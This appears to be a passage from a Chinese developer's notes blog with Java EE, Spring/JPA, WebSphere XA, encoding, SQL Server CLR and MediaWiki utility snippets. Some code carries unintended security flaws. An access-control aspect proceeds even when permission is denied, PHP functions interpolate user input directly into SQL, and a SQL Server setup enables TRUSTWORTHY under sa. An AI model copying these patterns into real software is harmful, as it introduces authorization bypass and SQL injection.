25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
 private static void defaultLanguage(Object i18n, Locale locale,
boolean AUser, I18nFiled i18nFiled, Field f)
throws SecurityException, NoSuchFieldException,
IllegalArgumentException, IllegalAccessException {
log.info("default locale");
if (AUser) {
Field enField = i18n.getClass().getDeclaredField(i18nFiled.en());
enField.setAccessible(true);
String enValue = enField.get(i18n).toString();
f.set(i18n, enValue);
} else {
// BUser
Field tcField = i18n.getClass().getDeclaredField(i18nFiled.tc());
tcField.setAccessible(true);
String tcValue = tcField.get(i18n).toString();
if (StringUtils.isNotEmpty(tcValue)) {
// show english
Field enField = i18n.getClass()
.getDeclaredField(i18nFiled.en());
enField.setAccessible(true);
String enValue = enField.get(i18n).toString();
f.set(i18n, enValue);
}
}
}

private static void convertI18n(Object i18n, Locale locale, boolean AUser) {
log.info("locale: " + locale);
Field[] fields = i18n.getClass().getDeclaredFields();
for (Field f : fields) {
if (f.isAnnotationPresent(I18nFiled.class)) {
f.setAccessible(true);
I18nFiled i18nFiled = f.getAnnotation(I18nFiled.class);
if (Locale.SIMPLIFIED_CHINESE.equals(locale)) {
Field scField = i18n.getClass().getDeclaredField(
i18nFiled.sc());
scField.setAccessible(true);
String scValue = scField.get(i18n).toString();
if (StringUtils.isNotEmpty(scValue)) {
f.set(i18n, scValue);
} else {
defaultLanguage(i18n, locale, AUser, i18nFiled, f);
}
} else if (Locale.TRADITIONAL_CHINESE.equals(locale)) {
Field tcField = i18n.getClass().getDeclaredField(
i18nFiled.tc());
tcField.setAccessible(true);
String tcValue = tcField.get(i18n).toString();
if (StringUtils.isNotEmpty(tcValue)) {
f.set(i18n, tcValue);
} else {
defaultLanguage(i18n, locale, AUser, i18nFiled, f);
}
} else {
defaultLanguage(i18n, locale, AUser, i18nFiled, f);
}
}
}
}

public static <T> T convertI18n(T i18n, PortletRequest request) {
Locale locale = request.getLocale();
User user = User.getCurrentUser(request);
UserInfo info = user.getUserInfo();
if (info instanceof AUserUserInfo) {
convertI18n(i18n, locale, true);
} else if (info instanceof BUserUserInfo) {
convertI18n(i18n, locale, false);
} else if (info instanceof UnknownUserInfo) {
convertI18n(i18n, locale, true);
}
return i18n;
}

public static <T> T convertI18n(T i18n) {
PortletRequest request = (PortletRequest) FacesContext
.getCurrentInstance().getExternalContext().getRequest();
return convertI18n(i18n, request);
}

EasyMock + Spring的Mock

本来想模拟JSF的 FacesContext.getCurrentInstance().getExternalContext().getRequest()来获得Principal 但发现比较麻烦,所以只实现模拟HttpServletRequest

使用EasyMock + Spring的MockObject做较为简单

1
2
3
4
5
6
7
8
Principal principal = EasyMock.createMock(Principal.class);
expect(principal.getName()).andReturn("JUDYEUNG");
MockHttpServletRequest request = new MockHttpServletRequest();
replay(principal);

request.setUserPrincipal(principal);

uploadBean.setRequest(request);

使用XA事务

如果使用WAS配置XA事务,可以参考

http://www.ibm.com/developerworks/cn/websphere/library/techarticles/0407_woolf/0407_woolf.html
http://liuqiang5151.iteye.com/blog/584422

如果使用Tomcat,可以使用atomickos

http://www.atomikos.com/

在WAS+Oracle环境中使用XA事务

  1. 定义XA数据源
  2. 使用XA的JDBC Driver
  3. 使用WebSphereUowTransactionManager,spring定义
    <bean id="transactionManager" class="org.springframework.transaction.jta.WebSphereUowTransactionManager"/>
    或者使用EJB的CMT或者使用JNDI获得transactionManager控制事务
  4. 如果是SQL SERVER 2008,则还需要如下步骤:
    Control Panel -> Administrative Tools -> Component Services -> Local DT -> right click -> Properties -> Enable XA Transactions
    之后restart SQLServer, restart WebServer(WAS or JBoss等)

参考:

JBoss的XA
http://wenku.baidu.com/view/9441cafa770bf78a65295463.html

SQL Server的XA
http://msdn.microsoft.com/en-us/library/aa342335.aspx
http://support.riversedgesoftware.com/knowledgebase.php?article=3

json-lib的toBean问题

XXBean有nested字段需要inject数据和有日期型数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
JsonConfig config = new JsonConfig();
config.setPropertySetStrategy(new PropertySetStrategy() {
@Override
public void setProperty(Object bean, String key, Object value)
throws JSONException {
try {
PropertyUtils.setNestedProperty(bean, key, value);
} catch (Exception e) {
e.printStackTrace();
}
}
});

XXBean xx = new XXBean();
XXBeanPK pk = new XXBeanPK();
xx.setPk(pk);

// 需要将字段中的日期型数据由java.sql.Date/java.sql.Timestamp改为java.util.Date
JSONUtils.getMorpherRegistry().registerMorpher(
new DateMorpher(new String[] { "dd/MM/yyyy", "HH:mm" }));

xx = (XX) JSONObject.toBean(JSONObject.fromObject(data, config), xx, config);
log.info("xx "+ ToStringBuilder.reflectionToString(xx, ToStringStyle.MULTI_LINE_STYLE));

自定义访问权限控制

项目需要做一些权限访问控制,觉得比较好的方案是AOP+annotation,因为在Java EE的权限控制也是使用类似方式实现。

AccessRight的注解

1
2
3
4
5
6
7
8
9
10
11
12
13
@Target( { ElementType.METHOD, ElementType.FIELD })
@Retention(RetentionPolicy.RUNTIME)
public @interface AccessRight {
String code();

boolean access() default false;

boolean create() default false;

boolean update() default false;

boolean delete() default false;
}

AccessControlAspect切面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
@Component //如果不加,spring似乎不会识别这是一个切面
@Aspect
public class AccessControlAspect {
private static final Logger log = Logger
.getLogger(AccessControlAspect.class);

@Pointcut("execution(* xx.*Bean.*()) ")
public void accessControl() {
}

@Around("accessControl()")
public Object checkRight(ProceedingJoinPoint jp) throws Throwable {
String methodName = jp.getSignature().getName();
log.info("check right: " + methodName);
Method method = jp.getTarget().getClass().getDeclaredMethod(methodName);
if (method.isAnnotationPresent(AccessRight.class)) {
AccessRight right = method.getAnnotation(AccessRight.class);
FunctionPermission permission = getRight(right.code());
if (right.access() && permission.hasAccessPermission()) {
log.info("has right to do");
return jp.proceed();
} else {
log.error("no right to do");
}

}
return jp.proceed();
}

private FunctionPermission getRight(String code) {
}
}

applicationContext.xml加如下内容:

1
2
<context:component-scan base-package="xx" />
<aop:aspectj-autoproxy proxy-target-class="false"/> true表示使用cglib代理,否则使用java反射代理

应用在controller中

1
2
3
4
5
6
7
8
9
@Controller
@Scope("request")
public class xxBean {
@AccessRight(code = "something", access = true)
public String foobar() {
log.info("test...");
return "test";
}
}

Servlet中执行定时任务

由于用spring配置的quartz在启动后不能获得UOWManager,考虑多时,只好在servlet启动时候执行定时任务。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
import java.io.IOException;
import java.util.Timer;

import javax.naming.InitialContext;
import javax.naming.NamingException;
import javax.persistence.EntityManager;
import javax.persistence.Persistence;
import javax.servlet.GenericServlet;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;

import org.apache.log4j.Logger;
import org.springframework.web.context.support.WebApplicationContextUtils;

import com.ibm.websphere.uow.UOWSynchronizationRegistry;
import com.ibm.ws.uow.UOWManager;
import com.ibm.wsspi.uow.UOWAction;
import com.ibm.wsspi.uow.UOWActionException;
import com.ibm.wsspi.uow.UOWException;

public class CronJobServlet extends GenericServlet {
private static final Logger log = Logger.getLogger(CronJobServlet.class);
private static UOWManager manager;
private static EntityManager em;
private XXJob clearXXJob;

@Override
public void init(ServletConfig config) throws ServletException {
initJob(config);
try {
InitialContext ic = new InitialContext();
manager = (UOWManager) ic.lookup("java:comp/websphere/UOWManager");
} catch (NamingException e) {
e.printStackTrace();
}
try {
manager.runUnderUOW(
UOWSynchronizationRegistry.UOW_TYPE_GLOBAL_TRANSACTION,
false, new UOWAction() {
public void run() throws Exception {
Timer timer = new Timer();
timer.schedule(clearXXJob, 2000,1000);
}

});
} catch (UOWActionException e) {
e.printStackTrace();
} catch (UOWException e) {
e.printStackTrace();
}

}

private void initJob(ServletConfig config) {
em = Persistence.createEntityManagerFactory("xx")
.createEntityManager();

final CronJobService cronJobService = (CronJobService) WebApplicationContextUtils
.getWebApplicationContext(config.getServletContext()).getBean(
"cronJobService");
cronJobService.setEntityManager(em);
clearXXJob = new ClearXXJob(cronJobService);
}

@Override
public void service(ServletRequest arg0, ServletResponse arg1)
throws ServletException, IOException {

}
}

spring 2.5 + jpa 1.0 + jsf 1.2

applicationContext.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:aop="http://www.springframework.org/schema/aop"
xmlns:context="http://www.springframework.org/schema/context"
xmlns:tx="http://www.springframework.org/schema/tx"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd
http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-2.5.xsd
http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-2.5.xsd
http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-2.5.xsd">

<!-- bean class="org.springframework.orm.jpa.support.PersistenceAnnotationBeanPostProcessor" / -->

<context:component-scan base-package="xx.yy.locker" />
<context:annotation-config />

<bean id="entityManagerFactory"
class="org.springframework.orm.jpa.LocalEntityManagerFactoryBean">
<property name="persistenceUnitName" value="locker" />
</bean>

<bean id="transactionManager"
class="org.springframework.transaction.jta.WebSphereUowTransactionManager"/>

<tx:annotation-driven transaction-manager="transactionManager" />

<tx:advice id="txAdvice" transaction-manager="transactionManager">
<tx:attributes>
<tx:method name="get*" read-only="true"/>
<tx:method name="*" read-only="false" />
</tx:attributes>
</tx:advice>

<aop:config>
<aop:pointcut id="lockerManagerOperation" expression="execution(public * xx.yy..*.*(..))"/>
<aop:advisor advice-ref="txAdvice" pointcut-ref="lockerManagerOperation"/>
</aop:config>

</beans>

persistence.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?xml version="1.0" encoding="UTF-8"?>
<persistence version="1.0"
xmlns="http://java.sun.com/xml/ns/persistence"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/persistence http://java.sun.com/xml/ns/persistence/persistence_1_0.xsd">
<persistence-unit name="testDB" transaction-type="JTA">
<provider>org.hibernate.ejb.HibernatePersistence</provider>
<jta-data-source>jdbc/xx</jta-data-source>
<properties>
<property name="hibernate.dialect"
value="org.hibernate.dialect.Oracle10gDialect" />
<property name="hibernate.connection.driver_class"
value="oracle.jdbc.pool.OracleConnectionPoolDataSource" />
<!-- property name="hibernate.transaction.factory_class" value="org.hibernate.transaction.CMTTransactionFactory" / -->
<property name="hibernate.transaction.manager_lookup_class" value="org.hibernate.transaction.WebSphereExtendedJTATransactionLookup"/>
</properties>
</persistence-unit>
</persistence>

libs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
antlr-2.7.6.jar
aspectjrt.jar
aspectjweaver.jar
commons-beanutils.jar
commons-collections.jar
commons-logging.jar
dom4j-1.6.1.jar
hibernate-annotations.jar
hibernate-commons-annotations.jar
hibernate-entitymanager.jar
hibernate3.jar
javassist-3.4.GA.jar
common-annotations.jar
log4j-1.2.16.jar
persistence.jar
slf4j-api-1.5.0.jar
slf4j-log4j12-1.5.0.jar
spring-2.5.jar

注意:

  1. 使用<context:component-scan><context:annotation-config />的话,可以不用
    <bean class="org.springframework.orm.jpa.support.PersistenceAnnotationBeanPostProcessor" />
  2. 使用<tx:annotation-driven> + <tx:advice> + <aop:config> 可以不用 @transactional
  3. WAS的TransactionManager要用WebSphereUowTransactionManager
  4. hibernate.transaction.manager_lookup_class 用 org.hibernate.transaction.WebSphereExtendedJTATransactionLookup
  5. hibernate.transaction.factory_class 不能使用 org.hibernate.transaction.CMTTransactionFactory,因为WAS的transaction不是一个joinableTransaction,所以只能使用org.hibernate.transaction.JDBCTransactionFactory
  6. 删除WEB-INF/lib中的jta.jar,否则会出现错误。估计这个jta.jar跟WAS的有版本不兼容问题。
  7. JSF集成spring
    web.xml
    1
    2
    3
    4
    5
    6
    7
    8
    9
     <listener>
    <listener-class>org.springframework.web.context.request.RequestContextListener</listener-class>
    </listener>
    faces-config.xml
    <faces-config>
    <application>
    <variable-resolver>org.springframework.web.jsf.DelegatingVariableResolver</variable-resolver>
    </application>
    </faces-config>
    这样就不用写Managed-Bean,但EL不能获得managedBean的数据,只能用JSF的EL读取managedBean,
    即不能${xBean},只能#{xBean}
  8. <context:annotation-config />支持JSR-250 annotations,即 @Resource, @PostConstruct, @PreDestroy。
    等价于<bean class="org.springframework.context.annotation.CommonAnnotationBeanPostProcessor">
    而CommonAnnotationBeanPostProcessor支持 @EJB

参考:

http://www.ibm.com/developerworks/websphere/techjournal/0609_alcott/0609_alcott.html

中文:

Java编码转换

gbk(cp18030/cp936)转unicode(cp1200)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
String str = "没有任何意义的一句说话";
for (int i = 0; i < str.length(); i++) {
String charactor = str.substring(i, i + 1);
byte[] b = charactor.getBytes("UTF-16BE"); // 如果是UTF-16LE,则高低位翻转
String s1 = Integer.toHexString(b[0]).replace("ffffff", "");
String s2 = Integer.toHexString(b[1]).replace("ffffff", "");
if (s1.length() < 2)
s1 = "0" + s1;
if (s2.length() < 2)
s2 = "0" + s2;
String s = s1 + s2;
out.println(String.format("十六进制的表示 &#x%s;", s));
out.println(String.format("十进制的表示 &#%s;", Integer.parseInt(s, 16))); //Integer.valueOf(s, 16) or Integer.decode("0x" + s)
out.println();
}<span class="Apple-style-span" style="font-family:''sans serif', tahoma, verdana, helvetica';font-size:x-large;"><span class="Apple-style-span" style="font-size:19px;line-height:19px;white-space:normal;"> </span></span>

numeric character reference(NCR)

以&#x03A3(16进制);或&#0931(十进制);都可以在html显示unicode字符,例如:Σ
Python的方法会简单一些:
unicode(‘没有任何意义的一句说话‘,’gbk’)可以输出它的unicode编码
显示十进制结果:int(‘3A3’, 16)

还原big5文字

char.txt文件保存的汉字是繁体big5编码的【書院】,但显示为【皘】

编写如下代码还原

1
2
3
4
5
6
InputStreamReader reader = new InputStreamReader(new FileInputStream("char.txt"));
char[] chars = new char[892600];
int len = reader.read(chars);
String sql = new String(chars, 0, len);
out.println(new String(sql.getBytes(), "big5_hkscs"));
reader.close();

参考:

Numeric_character_reference

在MSSQL Server 2008中创建可以访问外部资源的DLL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
CREATE ASSEMBLY [CharSetUtil]
FROM 'XXX.dll'
WITH PERMISSION_SET = EXTERNAL_ACCESS
GO

ALTER DATABASE [somedb] set TRUSTWORTHY on
EXEC sp_changedbowner 'sa'

USE somedb
GRANT EXTERNAL ACCESS ASSEMBLY TO sa

exec sp_configure 'show advanced options', '1';
reconfigure;
go

exec sp_configure 'clr enabled', '1'
go

reconfigure;
exec sp_configure 'show advanced options', '1';
go

编写clr函数注意:

  1. 静态类型static修饰的函数
  2. 如果函数内部不执行sql查询,应定义DataAccessKind.None
  3. 最好定义IsDeterministic = true。但如果是DataAccessKind.READ,定义确定性函数也是没有用的。

处理UTF-8格式的java文件中的多余空行的checkstyle问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
package test;


import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.FileReader;

import java.util.ArrayList;
import java.util.List;


public class RemoveBlacket
{
public static void main(String[] args)
throws Exception
{
for (String file : listPath())
{
System.out.println(file);
proces(file);
}
// test();
}


static void test()
throws Exception
{
String file = "C:\\Temp.java";
FileInputStream in = new FileInputStream(file);
byte[] bytes = new byte[81920000];
int len = in.read(bytes);
String content = new String(bytes, 0, len, "UTF-8"); // 以UTF-8格式处理内容
content = content.replaceAll("\r\n(\r\n\\s+\\})", "$1");
in.close();

FileOutputStream out = new FileOutputStream("C:/text.java");
// OutputStreamWriter writer = new OutputStreamWriter(out);
System.out.println(content);
out.write(content.getBytes("UTF-8"));; // 还原UTF-8格式内容

// writer.close();
out.close();

}


static void proces(String file)
throws Exception
{
FileInputStream in = new FileInputStream(file);
byte[] bytes = new byte[80920000];
int len = in.read(bytes);
String content = new String(bytes, 0, len, "UTF-8");// 以UTF-8格式处理内容
content = content.replaceAll("\r\n(\r\n\\s+\\})", "$1");
in.close();

FileOutputStream out = new FileOutputStream(file);
// System.out.println(content);
out.write(content.getBytes("UTF-8"));// 还原UTF-8格式内容

out.close();
}


static List<String> listPath()
throws Exception
{
List<String> list = new ArrayList<String>();
BufferedReader reader = new BufferedReader(new FileReader("c:/checkstyle-list.txt"));
String line;
while ((line = reader.readLine()) != null)
{
list.add(line);
}
reader.close();

return list;
}
}

用kyotocabinet备份MediaWiki数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
package jay;

import static java.lang.System.out;

import java.io.InputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

import kyotocabinet.Cursor;
import kyotocabinet.DB;

public class TakeBack {
static Connection conn;
static {
try {
Class.forName("com.mysql.jdbc.Driver");
conn = DriverManager.getConnection(
"jdbc:mysql://DBServer:3306/wiki", "user", "passwd");
} catch (Exception e) {
e.printStackTrace();
}
}

static void showHashDB() {
DB db = new DB();
if (!db.open("witube.kch", DB.OWRITER | DB.OCREATE)) {
System.err.println("open error: " + db.error());
}

Cursor cur = db.cursor();
cur.jump();
String[] rec;
while ((rec = cur.get_str(true)) != null) {
System.out.println(rec[0] + ":" + rec[1]);
break;
}
cur.disable();
if (!db.close()) {
System.err.println("close error: " + db.error());
}
}

static void backupMediawiki() throws Exception {
DB db = new DB();
if (!db.open("witube.kch", DB.OWRITER | DB.OCREATE)) {
System.err.println("open error: " + db.error());
}

String sql = "SELECT page_title, old_text FROM `page` p, revision r, text t WHERE page_latest = r.rev_id and r.rev_text_id = t.old_id and page_namespace = 0";
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(sql);
while (rs.next()) {
InputStream in = rs.getBlob(1).getBinaryStream();
byte[] bytes = new byte[89200000];
int len = in.read(bytes);
String title = new String(bytes, 0, len, "UTF-8");
in.close();

in = rs.getBlob(2).getBinaryStream();
len = in.read(bytes);
if (len == -1) {
out.println("标题:" + title + " 没有内容。");
continue;
}
String content = new String(bytes, 0, len, "UTF-8");
in.close();
// out.println("title: " + title + " content: " + content);

db.set(title, content);
}

rs.close();
stmt.close();
conn.close();
if (!db.close()) {
System.err.println("close error: " + db.error());
}
}

public static void main(String[] args) throws Exception {
backupMediawiki();
showHashDB();
}
}

apache POI + 中文过滤 导出MSSQL Server的数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
package jay;

import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.FileReader;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.regex.Pattern;

import static java.lang.System.out;
import org.apache.poi.hssf.usermodel.HSSFCell;
import org.apache.poi.hssf.usermodel.HSSFCellStyle;
import org.apache.poi.hssf.usermodel.HSSFFont;
import org.apache.poi.hssf.usermodel.HSSFRichTextString;
import org.apache.poi.hssf.usermodel.HSSFRow;
import org.apache.poi.hssf.usermodel.HSSFSheet;
import org.apache.poi.hssf.usermodel.HSSFWorkbook;
import org.apache.poi.hssf.util.HSSFColor;

public class CheckData {

static {
try {
Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
} catch (ClassNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}

static void run(String db, boolean only_chinese) throws Exception {
Map<String, List<String>> map = new HashMap<String, List<String>>();

BufferedReader reader = new BufferedReader(new FileReader(db + ".txt"));
String line;

/**
* table1=field1,field2,field3,field4,field5
* table2=field1,field2,field3,field4,field5
*/
while ((line = reader.readLine()) != null) {
List<String> list = new ArrayList<String>();
String[] parts = line.split("=");
String table = parts[0];
String fields = parts[1];
for (String filed : fields.split(",")) {
list.add(filed.trim());
}
map.put(table, list);
}

for (String key : map.keySet()) {
out.println("table: " + key + ", " + map.get(key));
}
reader.close();

genData(db, map, only_chinese);
}

static void genData(String db, Map<String, List<String>> map,
boolean only_chinese) {
Connection conn = null;

try {
conn = DriverManager
.getConnection("jdbc:sqlserver://DbServer:1433;integratedSecurity=true;DatabaseName="
+ "Public_" + db);
} catch (SQLException e) {
e.printStackTrace();
}

HSSFWorkbook wb = new HSSFWorkbook();
HSSFFont f = wb.createFont();
f.setFontHeightInPoints((short) 12);
// f.setColor(HSSFColor.RED.index);
f.setBoldweight(HSSFFont.BOLDWEIGHT_BOLD);

HSSFCellStyle cs = wb.createCellStyle();
cs.setFont(f);

int tables = 0;
for (String table : map.keySet()) {
listField(table, map.get(table), wb, cs, conn, only_chinese);
tables++;
}
out.println("共有" + tables + "个表的数据输出。");

try {
String fileName = db + ".xls";
if (only_chinese) {
fileName = db + "-only-chinese.xls";
}

FileOutputStream out = new FileOutputStream(fileName);
wb.write(out);
out.close();
} catch (Exception e) {
e.printStackTrace();
}

try {
conn.close();
} catch (SQLException e) {
e.printStackTrace();
}
}

static void listField(String table, List<String> options, HSSFWorkbook wb,
HSSFCellStyle cs, Connection conn, boolean only_chinese) {

HSSFSheet sheeet = wb.createSheet(table);
int row_index = 0;
HSSFRow row = sheeet.createRow(row_index++);
for (int i = 0; i < options.size(); i++) {
HSSFCell cell = row.createCell(i);
cell.setCellValue(options.get(i));
cell.setCellStyle(cs);
}

String selectOption = "";
for (int i = 0; i < options.size() - 1; i++) {
selectOption += options.get(i) + ",";
}
selectOption += options.get(options.size() - 1);

Statement stmt;
// 检查是否有中文
final String regexp = "[\u4e00-\u9fa5]+";
final Pattern pattern = Pattern.compile(regexp);

try {
stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select " + selectOption
+ " from " + table);
int limit = 65534;
boolean needCreate = false;
int sheetIndex = 2;
while (rs.next()) {
if (row_index > limit && row_index <= limit * 2) {
needCreate = true;
if (sheetIndex >= 5) {
out.println("table: " + table + " 超出最大数量" + sheetIndex
+ ",不再计算");
break;
}
}

if (needCreate) {
out.println("table: " + table + "(" + sheetIndex + ")"
+ " 生成");
sheeet = wb.createSheet(table + "(" + sheetIndex + ")");
sheetIndex++;
row_index = 1;
needCreate = false;
}

if (only_chinese) {
boolean hasChinese = false;

for (int i = 0; i < options.size(); i++) {
String value = rs.getString(i + 1);
if (value != null)
if (pattern.matcher(value).find()) {
hasChinese = true;
break;
}
}
if (hasChinese) {
row = sheeet.createRow(row_index++);
for (int i = 0; i < options.size(); i++) {
String value = rs.getString(i + 1);
HSSFCell cell = row.createCell(i);
cell.setCellValue(value);
}
}
} else {
row = sheeet.createRow(row_index++);
for (int i = 0; i < options.size(); i++) {
String value = rs.getString(i + 1);
HSSFCell cell = row.createCell(i);
cell.setCellValue(value);
}
}
}
} catch (SQLException e) {
e.printStackTrace();
}
}

static void xlsTest() throws Exception {
HSSFWorkbook wb = new HSSFWorkbook();

HSSFSheet s = wb.createSheet("sheet1");

HSSFFont f = wb.createFont();
f.setFontHeightInPoints((short) 12);
f.setColor(HSSFColor.RED.index);
f.setBoldweight(HSSFFont.BOLDWEIGHT_BOLD);

HSSFCellStyle cs = wb.createCellStyle();
cs.setFont(f);

// Define a few rows
for (short rownum = (short) 0; rownum < 30; rownum++) {
HSSFRow row = s.createRow(rownum);
for (short cellnum = (short) 0; cellnum < 10; cellnum += 2) {
HSSFCell cell2 = row.createCell(cellnum + 1);

cell2.setCellValue(new HSSFRichTextString("Hello! " + cellnum));
cell2.setCellStyle(cs);
}
}

// Save
FileOutputStream out = new FileOutputStream("workbook.xls");
wb.write(out);
out.close();
}

static void getMessageTest() throws Exception {
Connection conn = null;

final String regexp = "[\u4e00-\u9fa5]+";
final Pattern pattern = Pattern.compile(regexp);

try {
conn = DriverManager
.getConnection("jdbc:sqlserver://DbServer:1433;integratedSecurity=true;DatabaseName="
+ "Public_X");

Statement stmt = conn.createStatement();
ResultSet rs = stmt
.executeQuery("select dbo.big5ISOToUnicode(dbo.UnicodeToGbkISO(message)) from X where id = 4775");
while (rs.next()) {
String value = rs.getString(1);
out.println("<< " + value);
if (pattern.matcher(value).find()) {
out.println("find it...");
}

}

rs.close();
stmt.close();
conn.close();
} catch (SQLException e) {
e.printStackTrace();
}
}

public static void main(String[] args) throws Exception {
run("XDataBase", false); // show all
run("XDataBase", true); // only chinese character
// getMessageTest();
}
}

build.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<project default="run">
<target name="run">
<java classname="jay.CheckData" fork="yes">
<classpath>
<fileset dir="poi-3.7">
<include name="poi-3.7-20101029.jar" />
<include name="poi-scratchpad-3.7-20101029.jar" />
</fileset>
<path location="sqljdbc4.jar" />
<path location="bin" />
</classpath>
<jvmarg value="-Xms1024m" /> <!-- 数据较多,需要设置大内存,用Event model可能会更好 -->
<jvmarg value="-Xmx1024m" />
<jvmarg value="-Djava.library.path=E:\Software\JAVA\SQL" />
</java>
</target>
</project>

picoContainer的字段注入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
package test;

import static org.picocontainer.injectors.NamedFieldInjection.injectionFieldNames;

import java.util.ArrayList;
import java.util.Collection;

import javax.persistence.EntityManager;
import javax.persistence.Persistence;

import junit.framework.TestCase;

import org.picocontainer.DefaultPicoContainer;
import org.picocontainer.injectors.NamedFieldInjection;


public class TestAssignment
extends TestCase
{
static EntityManager em = Persistence.createEntityManagerFactory("x_system").createEntityManager();

DefaultPicoContainer pico = new DefaultPicoContainer(new NamedFieldInjection());


@Override
protected void setUp()
throws Exception
{
em.getTransaction().begin();
pico.addComponent(em);
}


@Override
protected void tearDown()
throws Exception
{
em.getTransaction().commit();
}


public void testBatchMark()
{
pico.as(injectionFieldNames("em")).addComponent(A.class);
pico.as(injectionFieldNames("em", "a")).addComponent(B.class);
pico.as(injectionFieldNames("em", "b")).addComponent(C.class);
C cBean = pico.getComponent(C.class);
Collection<X> xs = new ArrayList<X>();

cBean.someMethod("test", xs);
}
}

MediaWiki的标题和链接处理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<?php
function showTitle($title){
$title = iconv('gbk', 'utf-8', str_replace(' ', '_', $title));
$sql = "SELECT page_title FROM `page` WHERE `page_title` LIKE '%$title%'";
$result = mysql_query( $sql );
while ( $line = mysql_fetch_array( $result ) ) {
echo iconv('utf-8', 'gbk', $line[0]) . "\n";
}
mysql_free_result( $result );

echo "-------------------------- \n";
/*$sql = "SELECT pl_from, pl_title FROM `pagelinks` WHERE `pl_title` LIKE '%$title%'";
$result = mysql_query( $sql );
while ( $line = mysql_fetch_array( $result ) ) {
echo $line[0] . " -> " . iconv('utf-8', 'gbk', $line[1]) . "\n";
}
mysql_free_result( $result );*/
}

function findDeadLinks($title){
$title = iconv('gbk', 'utf-8', str_replace(' ', '_', $title));
$sql = "SELECT page_title FROM `page` p, revision r, text t WHERE page_latest = r.rev_id and r.rev_text_id = t.old_id and old_text like '%$title%'";
$result = mysql_query( $sql );
while ( $line = mysql_fetch_array( $result ) ) {
echo 'http://witube.hkma.org.gz/index.php?title=' . iconv('utf-8', 'gbk', $line[0]) . "\n";
}
mysql_free_result( $result );
}

function deleteTitle($title){
$title = iconv('gbk', 'utf-8', str_replace(' ', '_', $title));
